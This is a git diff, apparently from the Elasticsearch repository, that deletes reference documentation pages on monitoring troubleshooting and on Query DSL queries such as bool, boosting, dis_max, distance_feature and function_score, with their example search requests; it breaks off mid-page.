The security -tokens that are used in these contexts are cluster-specific, therefore you -cannot use a single {kib} instance to connect to both production and monitoring -clusters. - --- - -.. (Optional) Disable the collection of monitoring data in this {kib} instance. -Set the `xpack.monitoring.kibana.collection.enabled` setting to `false` in the -`kibana.yml` file. For more information about this setting, see -{kibana-ref}/monitoring-settings-kb.html[Monitoring settings in {kib}]. - -. {kibana-ref}/monitoring-data.html[Configure {kib} to retrieve and display the monitoring data]. diff --git a/docs/reference/monitoring/troubleshooting.asciidoc b/docs/reference/monitoring/troubleshooting.asciidoc deleted file mode 100644 index 120e80083b8..00000000000 --- a/docs/reference/monitoring/troubleshooting.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[monitoring-troubleshooting]] -== Troubleshooting monitoring -++++ -Troubleshooting -++++ - -Use the information in this section to troubleshoot common problems and find -answers for frequently asked questions. See also -{logstash-ref}/monitoring-troubleshooting.html[Troubleshooting monitoring in {ls}]. - -For issues that you cannot fix yourself … we’re here to help. -If you are an existing Elastic customer with a support contract, please create -a ticket in the -https://support.elastic.co/customers/s/login/[Elastic Support portal]. -Or post in the https://discuss.elastic.co/[Elastic forum]. - -[discrete] -[[monitoring-troubleshooting-no-data]] -=== No monitoring data is visible in {kib} - -*Symptoms*: -There is no information about your cluster on the *Stack Monitoring* page in -{kib}. - -*Resolution*: -Check whether the appropriate indices exist on the monitoring cluster. For -example, use the <> command to verify that -there is a `.monitoring-kibana*` index for your {kib} monitoring data and a -`.monitoring-es*` index for your {es} monitoring data. If you are collecting -monitoring data by using {metricbeat} the indices have `-mb` in their names. If -the indices do not exist, review your configuration. For example, see -<>. - -[discrete] -[[monitoring-troubleshooting-uuid]] -=== Monitoring data for some {stack} nodes or instances is missing from {kib} - -*Symptoms*: -The *Stack Monitoring* page in {kib} does not show information for some nodes or -instances in your cluster. - -*Resolution*: -Verify that the missing items have unique UUIDs. Each {es} node, {ls} node, -{kib} instance, Beat instance, and APM Server is considered unique based on its -persistent UUID, which is found in its `path.data` directory. Alternatively, you -can find the UUIDs in the product logs at startup. - -In some cases, you can also retrieve this information via APIs: - -* For Beat instances, use the HTTP endpoint to retrieve the `uuid` property. -For example, refer to -{filebeat-ref}/http-endpoint.html[Configure an HTTP endpoint for {filebeat} metrics]. -* For {kib} instances, use the -{kibana-ref}/access.html#status[status endpoint] to retrieve the `uuid` property. -* For {ls} nodes, use the -{logstash-ref}/monitoring-logstash.html[monitoring APIs root resource] to -retrieve the `id` property. - -TIP: When you install {es}, {ls}, {kib}, APM Server, or Beats, their `path.data` -directory should be non-existent or empty; do not copy this directory from other -installations. 
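For {es} nodes, the node ID reported by the cat nodes API reflects this persistent UUID, so a request such as the following (illustrative) can help confirm that every node appears with a distinct ID:

[source,console]
----
GET _cat/nodes?v&h=name,id
----
// TEST[skip:illustrative example only]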
- - diff --git a/docs/reference/query-dsl.asciidoc b/docs/reference/query-dsl.asciidoc deleted file mode 100644 index 6e7d3527f91..00000000000 --- a/docs/reference/query-dsl.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[query-dsl]] -= Query DSL - -[partintro] --- - -Elasticsearch provides a full Query DSL (Domain Specific Language) based on JSON to define queries. -Think of the Query DSL as an AST (Abstract Syntax Tree) of queries, consisting of two types of -clauses: - -Leaf query clauses:: - -Leaf query clauses look for a particular value in a particular field, such as the -<>, <> or -<> queries. These queries can be used -by themselves. - -Compound query clauses:: - -Compound query clauses wrap other leaf *or* compound queries and are used to combine -multiple queries in a logical fashion (such as the -<> or <> query), -or to alter their behaviour (such as the -<> query). - -Query clauses behave differently depending on whether they are used in -<>. - -[[query-dsl-allow-expensive-queries]] -Allow expensive queries:: -Certain types of queries will generally execute slowly due to the way they are implemented, which can affect -the stability of the cluster. Those queries can be categorised as follows: -* Queries that need to do linear scans to identify matches: -** <> -* Queries that have a high up-front cost : -** <> (except on <> fields) -** <> (except on <> fields) -** <> (except on <> fields or those without <>) -** <> (except on <> fields) -** <> on <> and <> fields -* <> -* Queries on <> -* Queries that may have a high per-document cost: -** <> -** <> - -The execution of such queries can be prevented by setting the value of the `search.allow_expensive_queries` -setting to `false` (defaults to `true`). --- - -include::query-dsl/query_filter_context.asciidoc[] - -include::query-dsl/compound-queries.asciidoc[] - -include::query-dsl/full-text-queries.asciidoc[] - -include::query-dsl/geo-queries.asciidoc[] - -include::query-dsl/shape-queries.asciidoc[] - -include::query-dsl/joining-queries.asciidoc[] - -include::query-dsl/match-all-query.asciidoc[] - -include::query-dsl/span-queries.asciidoc[] - -include::query-dsl/special-queries.asciidoc[] - -include::query-dsl/term-level-queries.asciidoc[] - -include::query-dsl/minimum-should-match.asciidoc[] - -include::query-dsl/multi-term-rewrite.asciidoc[] - -include::query-dsl/regexp-syntax.asciidoc[] diff --git a/docs/reference/query-dsl/_query-template.asciidoc b/docs/reference/query-dsl/_query-template.asciidoc deleted file mode 100644 index a5b8b447525..00000000000 --- a/docs/reference/query-dsl/_query-template.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -//// -This is a template for query DSL reference documentation. - -To document a new query type, copy this file, remove comments like this, and -replace "sample" with the appropriate query name. - -Ensure the new query docs are linked and included in -docs/reference/query-dsl.asciidoc -//// - -[[query-dsl-sample-query]] -=== Sample query -++++ -Sample -++++ - -//// -INTRO -Include a brief, 1-2 sentence description. -//// - -Does a cool thing. For example, it matches `x` to `y`. - -[[sample-query-ex-request]] -==== Example request -//// -Basic example of a search request consisting of only this query. - -Guidelines -*************************************** -* Don't include the index name in the request path. -* Don't include common parameters, such as `boost`. -* For clarity, use the long version of the request body. You can include a - short request example in the 'Notes' section. 
-* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -[source,console] ----- -GET _search -{ - "query": { - "sample": { - "foo": "baz", - "bar": true - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] - -[[sample-query-params]] -==== Parameters - -//// -Documents each parameter for the query. - -Guidelines -*************************************** -* Use a definition list. -* End each definition with a period. -* Include whether the parameter is Optional or Required and the data type. -* Include default values as the last sentence of the first paragraph. -* Include a range of valid values, if applicable. -* If the parameter requires a specific delimiter for multiple values, say so. -* If the parameter supports wildcards, ditto. -* For large or nested objects, consider linking to a separate definition list. -*************************************** -//// - -`foo`:: -(Required, string) -A cool thing. - -`bar`:: -(Optional, string) -If `true`, does a cool thing. -Defaults to `false`. - - -[[sample-query-notes]] -==== Notes -//// -Contains extra information about the query, including: -* Additional examples for parameters or short request bodies. -* Tips or advice for using the query. - -Guidelines -*************************************** -* For longer sections, consider using the `[%collapsible] macro. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -===== Avoid using the `sample` query for `text` fields - -By default, {es} changes the values of `text` fields during analysis. For -example, ... - -===== Using the `sample` query on time series data - -You can use the `sample` query to perform searches on time series data. -For example: - -[source,console] ----- -GET my_time_series_index/_search -{ - "query": { - "sample": { - "foo": "baz", - "bar": false - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] \ No newline at end of file diff --git a/docs/reference/query-dsl/bool-query.asciidoc b/docs/reference/query-dsl/bool-query.asciidoc deleted file mode 100644 index 1a78e131e01..00000000000 --- a/docs/reference/query-dsl/bool-query.asciidoc +++ /dev/null @@ -1,171 +0,0 @@ -[[query-dsl-bool-query]] -=== Boolean query -++++ -Boolean -++++ - -A query that matches documents matching boolean combinations of other -queries. The bool query maps to Lucene `BooleanQuery`. It is built using -one or more boolean clauses, each clause with a typed occurrence. The -occurrence types are: - -[cols="<,<",options="header",] -|======================================================================= -|Occur |Description -|`must` |The clause (query) must appear in matching documents and will -contribute to the score. - -|`filter` |The clause (query) must appear in matching documents. However unlike -`must` the score of the query will be ignored. Filter clauses are executed -in <>, meaning that scoring is ignored -and clauses are considered for caching. - -|`should` |The clause (query) should appear in the matching document. - -|`must_not` |The clause (query) must not appear in the matching -documents. Clauses are executed in <> meaning -that scoring is ignored and clauses are considered for caching. Because scoring is -ignored, a score of `0` for all documents is returned. 
-|======================================================================= - -The `bool` query takes a _more-matches-is-better_ approach, so the score from -each matching `must` or `should` clause will be added together to provide the -final `_score` for each document. - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "bool" : { - "must" : { - "term" : { "user.id" : "kimchy" } - }, - "filter": { - "term" : { "tags" : "production" } - }, - "must_not" : { - "range" : { - "age" : { "gte" : 10, "lte" : 20 } - } - }, - "should" : [ - { "term" : { "tags" : "env1" } }, - { "term" : { "tags" : "deployed" } } - ], - "minimum_should_match" : 1, - "boost" : 1.0 - } - } -} --------------------------------------------------- - -[[bool-min-should-match]] -==== Using `minimum_should_match` - -You can use the `minimum_should_match` parameter to specify the number or -percentage of `should` clauses returned documents _must_ match. - -If the `bool` query includes at least one `should` clause and no `must` or -`filter` clauses, the default value is `1`. -Otherwise, the default value is `0`. - -For other valid values, see the -<>. - -[[score-bool-filter]] -==== Scoring with `bool.filter` - -Queries specified under the `filter` element have no effect on scoring -- -scores are returned as `0`. Scores are only affected by the query that has -been specified. For instance, all three of the following queries return -all documents where the `status` field contains the term `active`. - -This first query assigns a score of `0` to all documents, as no scoring -query has been specified: - -[source,console] ---------------------------------- -GET _search -{ - "query": { - "bool": { - "filter": { - "term": { - "status": "active" - } - } - } - } -} ---------------------------------- - -This `bool` query has a `match_all` query, which assigns a score of `1.0` to -all documents. - -[source,console] ---------------------------------- -GET _search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "term": { - "status": "active" - } - } - } - } -} ---------------------------------- - -This `constant_score` query behaves in exactly the same way as the second example above. -The `constant_score` query assigns a score of `1.0` to all documents matched -by the filter. - -[source,console] ---------------------------------- -GET _search -{ - "query": { - "constant_score": { - "filter": { - "term": { - "status": "active" - } - } - } - } -} ---------------------------------- - -[[named-queries]] -==== Named queries - -Each query accepts a `_name` in its top level definition. You can use named -queries to track which queries matched returned documents. If named queries are -used, the response includes a `matched_queries` property for each hit. 
- -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "should": [ - { "match": { "name.first": { "query": "shay", "_name": "first" } } }, - { "match": { "name.last": { "query": "banon", "_name": "last" } } } - ], - "filter": { - "terms": { - "name.last": [ "banon", "kimchy" ], - "_name": "test" - } - } - } - } -} ----- diff --git a/docs/reference/query-dsl/boosting-query.asciidoc b/docs/reference/query-dsl/boosting-query.asciidoc deleted file mode 100644 index 050ca7746bd..00000000000 --- a/docs/reference/query-dsl/boosting-query.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[[query-dsl-boosting-query]] -=== Boosting query -++++ -Boosting -++++ - -Returns documents matching a `positive` query while reducing the -<> of documents that also match a -`negative` query. - -You can use the `boosting` query to demote certain documents without -excluding them from the search results. - -[[boosting-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "boosting": { - "positive": { - "term": { - "text": "apple" - } - }, - "negative": { - "term": { - "text": "pie tart fruit crumble tree" - } - }, - "negative_boost": 0.5 - } - } -} ----- - -[[boosting-top-level-params]] -==== Top-level parameters for `boosting` - -`positive`:: -(Required, query object) Query you wish to run. Any returned documents must -match this query. - -`negative`:: -+ --- -(Required, query object) Query used to decrease the <> of matching documents. - -If a returned document matches the `positive` query and this query, the -`boosting` query calculates the final <> for -the document as follows: - -. Take the original relevance score from the `positive` query. -. Multiply the score by the `negative_boost` value. --- - -`negative_boost`:: -(Required, float) Floating point number between `0` and `1.0` used to decrease -the <> of documents matching the -`negative` query. \ No newline at end of file diff --git a/docs/reference/query-dsl/common-terms-query.asciidoc b/docs/reference/query-dsl/common-terms-query.asciidoc deleted file mode 100644 index b62bb95fd73..00000000000 --- a/docs/reference/query-dsl/common-terms-query.asciidoc +++ /dev/null @@ -1,297 +0,0 @@ -[[query-dsl-common-terms-query]] -=== Common Terms Query - -deprecated[7.3.0,"Use <> instead, which skips blocks of documents efficiently, without any configuration, provided that the total number of hits is not tracked."] - -The `common` terms query is a modern alternative to stopwords which -improves the precision and recall of search results (by taking stopwords -into account), without sacrificing performance. - -[discrete] -==== The problem - -Every term in a query has a cost. A search for `"The brown fox"` -requires three term queries, one for each of `"the"`, `"brown"` and -`"fox"`, all of which are executed against all documents in the index. -The query for `"the"` is likely to match many documents and thus has a -much smaller impact on relevance than the other two terms. - -Previously, the solution to this problem was to ignore terms with high -frequency. By treating `"the"` as a _stopword_, we reduce the index size -and reduce the number of term queries that need to be executed. - -The problem with this approach is that, while stopwords have a small -impact on relevance, they are still important. 
If we remove stopwords, -we lose precision, (eg we are unable to distinguish between `"happy"` -and `"not happy"`) and we lose recall (eg text like `"The The"` or -`"To be or not to be"` would simply not exist in the index). - -[discrete] -==== The solution - -The `common` terms query divides the query terms into two groups: more -important (ie _low frequency_ terms) and less important (ie _high -frequency_ terms which would previously have been stopwords). - -First it searches for documents which match the more important terms. -These are the terms which appear in fewer documents and have a greater -impact on relevance. - -Then, it executes a second query for the less important terms -- terms -which appear frequently and have a low impact on relevance. But instead -of calculating the relevance score for *all* matching documents, it only -calculates the `_score` for documents already matched by the first -query. In this way the high frequency terms can improve the relevance -calculation without paying the cost of poor performance. - -If a query consists only of high frequency terms, then a single query is -executed as an `AND` (conjunction) query, in other words all terms are -required. Even though each individual term will match many documents, -the combination of terms narrows down the resultset to only the most -relevant. The single query can also be executed as an `OR` with a -specific -<>, -in this case a high enough value should probably be used. - -Terms are allocated to the high or low frequency groups based on the -`cutoff_frequency`, which can be specified as an absolute frequency -(`>=1`) or as a relative frequency (`0.0 .. 1.0`). (Remember that document -frequencies are computed on a per shard level as explained in the blog post -{defguide}/relevance-is-broken.html[Relevance is broken].) - -Perhaps the most interesting property of this query is that it adapts to -domain specific stopwords automatically. For example, on a video hosting -site, common terms like `"clip"` or `"video"` will automatically behave -as stopwords without the need to maintain a manual list. - -[discrete] -==== Examples - -In this example, words that have a document frequency greater than 0.1% -(eg `"this"` and `"is"`) will be treated as _common terms_. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "this is bonsai cool", - "cutoff_frequency": 0.001 - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -The number of terms which should match can be controlled with the -<> -(`high_freq`, `low_freq`), `low_freq_operator` (default `"or"`) and -`high_freq_operator` (default `"or"`) parameters. 
- -For low frequency terms, set the `low_freq_operator` to `"and"` to make -all terms required: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "nelly the elephant as a cartoon", - "cutoff_frequency": 0.001, - "low_freq_operator": "and" - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": [ - { "term": { "body": "nelly"}}, - { "term": { "body": "elephant"}}, - { "term": { "body": "cartoon"}} - ], - "should": [ - { "term": { "body": "the"}}, - { "term": { "body": "as"}}, - { "term": { "body": "a"}} - ] - } - } -} --------------------------------------------------- - -Alternatively use -<> -to specify a minimum number or percentage of low frequency terms which -must be present, for instance: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "nelly the elephant as a cartoon", - "cutoff_frequency": 0.001, - "minimum_should_match": 2 - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "bool": { - "should": [ - { "term": { "body": "nelly"}}, - { "term": { "body": "elephant"}}, - { "term": { "body": "cartoon"}} - ], - "minimum_should_match": 2 - } - }, - "should": [ - { "term": { "body": "the"}}, - { "term": { "body": "as"}}, - { "term": { "body": "a"}} - ] - } - } -} --------------------------------------------------- - -A different -<> -can be applied for low and high frequency terms with the additional -`low_freq` and `high_freq` parameters. Here is an example when providing -additional parameters (note the change in structure): - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "nelly the elephant not as a cartoon", - "cutoff_frequency": 0.001, - "minimum_should_match": { - "low_freq": 2, - "high_freq": 3 - } - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "bool": { - "should": [ - { "term": { "body": "nelly"}}, - { "term": { "body": "elephant"}}, - { "term": { "body": "cartoon"}} - ], - "minimum_should_match": 2 - } - }, - "should": { - "bool": { - "should": [ - { "term": { "body": "the"}}, - { "term": { "body": "not"}}, - { "term": { "body": "as"}}, - { "term": { "body": "a"}} - ], - "minimum_should_match": 3 - } - } - } - } -} --------------------------------------------------- - -In this case it means the high frequency terms have only an impact on -relevance when there are at least three of them. 
But the most -interesting use of the -<> -for high frequency terms is when there are only high frequency terms: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "how not to be", - "cutoff_frequency": 0.001, - "minimum_should_match": { - "low_freq": 2, - "high_freq": 3 - } - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "should": [ - { "term": { "body": "how"}}, - { "term": { "body": "not"}}, - { "term": { "body": "to"}}, - { "term": { "body": "be"}} - ], - "minimum_should_match": "3<50%" - } - } -} --------------------------------------------------- - -The high frequency generated query is then slightly less restrictive -than with an `AND`. - -The `common` terms query also supports `boost` and `analyzer` as -parameters. diff --git a/docs/reference/query-dsl/compound-queries.asciidoc b/docs/reference/query-dsl/compound-queries.asciidoc deleted file mode 100644 index d156950e355..00000000000 --- a/docs/reference/query-dsl/compound-queries.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -[[compound-queries]] -== Compound queries - -Compound queries wrap other compound or leaf queries, either to combine their -results and scores, to change their behaviour, or to switch from query to -filter context. - -The queries in this group are: - -<>:: -The default query for combining multiple leaf or compound query clauses, as -`must`, `should`, `must_not`, or `filter` clauses. The `must` and `should` -clauses have their scores combined -- the more matching clauses, the better -- -while the `must_not` and `filter` clauses are executed in filter context. - -<>:: -Return documents which match a `positive` query, but reduce the score of -documents which also match a `negative` query. - -<>:: -A query which wraps another query, but executes it in filter context. All -matching documents are given the same ``constant'' `_score`. - -<>:: -A query which accepts multiple queries, and returns any documents which match -any of the query clauses. While the `bool` query combines the scores from all -matching queries, the `dis_max` query uses the score of the single best- -matching query clause. - -<>:: -Modify the scores returned by the main query with functions to take into -account factors like popularity, recency, distance, or custom algorithms -implemented with scripting. - - -include::bool-query.asciidoc[] -include::boosting-query.asciidoc[] -include::constant-score-query.asciidoc[] -include::dis-max-query.asciidoc[] -include::function-score-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/constant-score-query.asciidoc b/docs/reference/query-dsl/constant-score-query.asciidoc deleted file mode 100644 index f2e8d7a16b4..00000000000 --- a/docs/reference/query-dsl/constant-score-query.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[query-dsl-constant-score-query]] -=== Constant score query -++++ -Constant score -++++ - -Wraps a <> and returns every matching -document with a <> equal to the `boost` -parameter value. 
- -[source,console] ----- -GET /_search -{ - "query": { - "constant_score": { - "filter": { - "term": { "user.id": "kimchy" } - }, - "boost": 1.2 - } - } -} ----- - -[[constant-score-top-level-params]] -==== Top-level parameters for `constant_score` -`filter`:: -+ --- -(Required, query object) <> you wish to run. -Any returned documents must match this query. - -Filter queries do not calculate <>. To -speed up performance, {es} automatically caches frequently used filter queries. --- - -`boost`:: -(Optional, float) Floating point number used as the constant -<> for every document matching the -`filter` query. Defaults to `1.0`. \ No newline at end of file diff --git a/docs/reference/query-dsl/dis-max-query.asciidoc b/docs/reference/query-dsl/dis-max-query.asciidoc deleted file mode 100644 index 80bc34236a9..00000000000 --- a/docs/reference/query-dsl/dis-max-query.asciidoc +++ /dev/null @@ -1,66 +0,0 @@ -[[query-dsl-dis-max-query]] -=== Disjunction max query -++++ -Disjunction max -++++ - -Returns documents matching one or more wrapped queries, called query clauses or -clauses. - -If a returned document matches multiple query clauses, the `dis_max` query -assigns the document the highest relevance score from any matching clause, plus -a tie breaking increment for any additional matching subqueries. - -You can use the `dis_max` to search for a term in fields mapped with different -<> factors. - -[[query-dsl-dis-max-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "dis_max": { - "queries": [ - { "term": { "title": "Quick pets" } }, - { "term": { "body": "Quick pets" } } - ], - "tie_breaker": 0.7 - } - } -} ----- - -[[query-dsl-dis-max-query-top-level-params]] -==== Top-level parameters for `dis_max` - -`queries`:: -(Required, array of query objects) Contains one or more query clauses. Returned -documents **must match one or more** of these queries. If a document matches -multiple queries, {es} uses the highest <>. - -`tie_breaker`:: -+ --- -(Optional, float) Floating point number between `0` and `1.0` used to increase -the <> of documents matching multiple -query clauses. Defaults to `0.0`. - -You can use the `tie_breaker` value to assign higher relevance scores to -documents that contain the same term in multiple fields than documents that -contain this term in only the best of those multiple fields, without confusing -this with the better case of two different terms in the multiple fields. - -If a document matches multiple clauses, the `dis_max` query calculates the -relevance score for the document as follows: - -. Take the relevance score from a matching clause with the highest score. -. Multiply the score from any other matching clauses by the `tie_breaker` value. -. Add the highest score to the multiplied scores. - -If the `tie_breaker` value is greater than `0.0`, all matching clauses count, -but the clause with the highest score counts most. --- \ No newline at end of file diff --git a/docs/reference/query-dsl/distance-feature-query.asciidoc b/docs/reference/query-dsl/distance-feature-query.asciidoc deleted file mode 100644 index 05ce0873f58..00000000000 --- a/docs/reference/query-dsl/distance-feature-query.asciidoc +++ /dev/null @@ -1,225 +0,0 @@ -[[query-dsl-distance-feature-query]] -=== Distance feature query -++++ -Distance feature -++++ - -Boosts the <> of documents closer to a -provided `origin` date or point. For example, you can use this query to give -more weight to documents closer to a certain date or location. 
- -You can use the `distance_feature` query to find the nearest neighbors to a -location. You can also use the query in a <> -search's `should` filter to add boosted relevance scores to the `bool` query's -scores. - - -[[distance-feature-query-ex-request]] -==== Example request - -[[distance-feature-index-setup]] -===== Index setup -To use the `distance_feature` query, your index must include a <>, -<> or <> field. - -To see how you can set up an index for the `distance_feature` query, try the -following example. - -. Create an `items` index with the following field mapping: -+ --- - -* `name`, a <> field -* `production_date`, a <> field -* `location`, a <> field - -[source,console] ----- -PUT /items -{ - "mappings": { - "properties": { - "name": { - "type": "keyword" - }, - "production_date": { - "type": "date" - }, - "location": { - "type": "geo_point" - } - } - } -} ----- -// TESTSETUP --- - -. Index several documents to this index. -+ --- -[source,console] ----- -PUT /items/_doc/1?refresh -{ - "name" : "chocolate", - "production_date": "2018-02-01", - "location": [-71.34, 41.12] -} - -PUT /items/_doc/2?refresh -{ - "name" : "chocolate", - "production_date": "2018-01-01", - "location": [-71.3, 41.15] -} - - -PUT /items/_doc/3?refresh -{ - "name" : "chocolate", - "production_date": "2017-12-01", - "location": [-71.3, 41.12] -} ----- --- - - -[[distance-feature-query-ex-query]] -===== Example queries - -[[distance-feature-query-date-ex]] -====== Boost documents based on date -The following `bool` search returns documents with a `name` value of -`chocolate`. The search also uses the `distance_feature` query to increase the -relevance score of documents with a `production_date` value closer to `now`. - -[source,console] ----- -GET /items/_search -{ - "query": { - "bool": { - "must": { - "match": { - "name": "chocolate" - } - }, - "should": { - "distance_feature": { - "field": "production_date", - "pivot": "7d", - "origin": "now" - } - } - } - } -} ----- - -[[distance-feature-query-distance-ex]] -====== Boost documents based on location -The following `bool` search returns documents with a `name` value of -`chocolate`. The search also uses the `distance_feature` query to increase the -relevance score of documents with a `location` value closer to `[-71.3, 41.15]`. - -[source,console] ----- -GET /items/_search -{ - "query": { - "bool": { - "must": { - "match": { - "name": "chocolate" - } - }, - "should": { - "distance_feature": { - "field": "location", - "pivot": "1000m", - "origin": [-71.3, 41.15] - } - } - } - } -} ----- - - -[[distance-feature-top-level-params]] -==== Top-level parameters for `distance_feature` -`field`:: -(Required, string) Name of the field used to calculate distances. This field -must meet the following criteria: - -* Be a <>, <> or -<> field -* Have an <> mapping parameter value of `true`, which is -the default -* Have an <> mapping parameter value of `true`, which -is the default - -`origin`:: -+ --- -(Required, string) Date or point of origin used to calculate distances. - -If the `field` value is a <> or <> -field, the `origin` value must be a <>. -<>, such as `now-1h`, is supported. - -If the `field` value is a <> field, the `origin` value -must be a geopoint. --- - -`pivot`:: -+ --- -(Required, <> or <>) -Distance from the `origin` at which relevance scores receive half of the `boost` -value. - -If the `field` value is a <> or <> -field, the `pivot` value must be a <>, such as `1h` or -`10d`. 
- -If the `field` value is a <> field, the `pivot` value -must be a <>, such as `1km` or `12m`. --- - -`boost`:: -+ --- -(Optional, float) Floating point number used to multiply the -<> of matching documents. This value -cannot be negative. Defaults to `1.0`. --- - - -[[distance-feature-notes]] -==== Notes - -[[distance-feature-calculation]] -===== How the `distance_feature` query calculates relevance scores -The `distance_feature` query dynamically calculates the distance between the -`origin` value and a document's field values. It then uses this distance as a -feature to boost the <> of closer -documents. - -The `distance_feature` query calculates a document's -<> as follows: - -``` -relevance score = boost * pivot / (pivot + distance) -``` - -The `distance` is the absolute difference between the `origin` value and a -document's field value. - -[[distance-feature-skip-hits]] -===== Skip non-competitive hits -Unlike the <> query or other -ways to change <>, the -`distance_feature` query efficiently skips non-competitive hits when the -<> parameter is **not** `true`. \ No newline at end of file diff --git a/docs/reference/query-dsl/exists-query.asciidoc b/docs/reference/query-dsl/exists-query.asciidoc deleted file mode 100644 index 75d1b07ea38..00000000000 --- a/docs/reference/query-dsl/exists-query.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[query-dsl-exists-query]] -=== Exists query -++++ -Exists -++++ - -Returns documents that contain an indexed value for a field. - -An indexed value may not exist for a document's field due to a variety of reasons: - -* The field in the source JSON is `null` or `[]` -* The field has `"index" : false` set in the mapping -* The length of the field value exceeded an `ignore_above` setting in the mapping -* The field value was malformed and `ignore_malformed` was defined in the mapping - -[[exists-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "exists": { - "field": "user" - } - } -} ----- - -[[exists-query-top-level-params]] -==== Top-level parameters for `exists` -`field`:: -(Required, string) Name of the field you wish to search. -+ -While a field is deemed non-existent if the JSON value is `null` or `[]`, these -values will indicate the field does exist: -+ -* Empty strings, such as `""` or `"-"` -* Arrays containing `null` and another value, such as `[null, "foo"]` -* A custom <>, defined in field mapping - -[[exists-query-notes]] -==== Notes - -[[find-docs-null-values]] -===== Find documents missing indexed values -To find documents that are missing an indexed value for a field, -use the `must_not` <> with the `exists` -query. - -The following search returns documents that are missing an indexed value for -the `user.id` field. - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "must_not": { - "exists": { - "field": "user.id" - } - } - } - } -} ----- diff --git a/docs/reference/query-dsl/full-text-queries.asciidoc b/docs/reference/query-dsl/full-text-queries.asciidoc deleted file mode 100644 index dda1c1546d0..00000000000 --- a/docs/reference/query-dsl/full-text-queries.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[full-text-queries]] -== Full text queries - -The full text queries enable you to search <> such as the -body of an email. The query string is processed using the same analyzer that was applied to -the field during indexing. - -The queries in this group are: - -<>:: -A full text query that allows fine-grained control of the ordering and -proximity of matching terms. 
- -<>:: -The standard query for performing full text queries, including fuzzy matching -and phrase or proximity queries. - -<>:: -Creates a `bool` query that matches each term as a `term` query, except for -the last term, which is matched as a `prefix` query - -<>:: -Like the `match` query but used for matching exact phrases or word proximity matches. - -<>:: -Like the `match_phrase` query, but does a wildcard search on the final word. - -<>:: -The multi-field version of the `match` query. - -<>:: - - A more specialized query which gives more preference to uncommon words. - -<>:: -Supports the compact Lucene <>, -allowing you to specify AND|OR|NOT conditions and multi-field search -within a single query string. For expert users only. - -<>:: -A simpler, more robust version of the `query_string` syntax suitable -for exposing directly to users. - - -include::intervals-query.asciidoc[] - -include::match-query.asciidoc[] - -include::match-bool-prefix-query.asciidoc[] - -include::match-phrase-query.asciidoc[] - -include::match-phrase-prefix-query.asciidoc[] - -include::multi-match-query.asciidoc[] - -include::common-terms-query.asciidoc[] - -include::query-string-query.asciidoc[] - -include::simple-query-string-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/function-score-query.asciidoc b/docs/reference/query-dsl/function-score-query.asciidoc deleted file mode 100644 index 9e742c90a55..00000000000 --- a/docs/reference/query-dsl/function-score-query.asciidoc +++ /dev/null @@ -1,664 +0,0 @@ -[[query-dsl-function-score-query]] -=== Function score query -++++ -Function score -++++ - -The `function_score` allows you to modify the score of documents that are -retrieved by a query. This can be useful if, for example, a score -function is computationally expensive and it is sufficient to compute -the score on a filtered set of documents. - -To use `function_score`, the user has to define a query and one or -more functions, that compute a new score for each document returned -by the query. - -`function_score` can be used with only one function like this: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { "match_all": {} }, - "boost": "5", - "random_score": {}, <1> - "boost_mode": "multiply" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> See <> for a list of supported functions. - -Furthermore, several functions can be combined. In this case one can -optionally choose to apply the function only if a document matches a -given filtering query - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { "match_all": {} }, - "boost": "5", <1> - "functions": [ - { - "filter": { "match": { "test": "bar" } }, - "random_score": {}, <2> - "weight": 23 - }, - { - "filter": { "match": { "test": "cat" } }, - "weight": 42 - } - ], - "max_boost": 42, - "score_mode": "max", - "boost_mode": "multiply", - "min_score": 42 - } - } -} 